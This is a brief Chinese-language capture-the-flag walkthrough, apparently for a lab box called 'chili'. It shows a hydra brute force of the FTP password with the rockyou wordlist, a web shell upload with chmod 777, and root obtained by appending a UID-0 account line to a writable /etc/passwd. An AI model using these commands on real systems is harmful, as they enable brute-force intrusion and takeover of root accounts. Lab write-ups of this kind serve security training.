扫描IP以及端口: 访问80端口,一个小辣椒,目录扫描,啥都没有,只能从ftp下手了: 看了看hint,用chili当作用户名试试破解一下密码: 利用hydra破解ftp密码:
hydra -l chili -P /usr/share/wordlists/rockyou.txt -f -V ftp://192.168.198.150得到密码:
成功进入: 进入到/var/www/html下,.nano下可读可写: 上传shell文件,别忘了加权限chmod 777: 访问,监听: 就一个用户chili,,,内核也较新: 发现passwd可以写入: 直接利用kali的工具openssl:
openssl passwd -1 -salt shell 123写入到passwd:
echo 'shell:$1$shell$5TvJA7y/9faSDWR84IKgZ/:0:0::/root:/bin/bash'>>/etc/passwd成功获取root权限,读取flag:
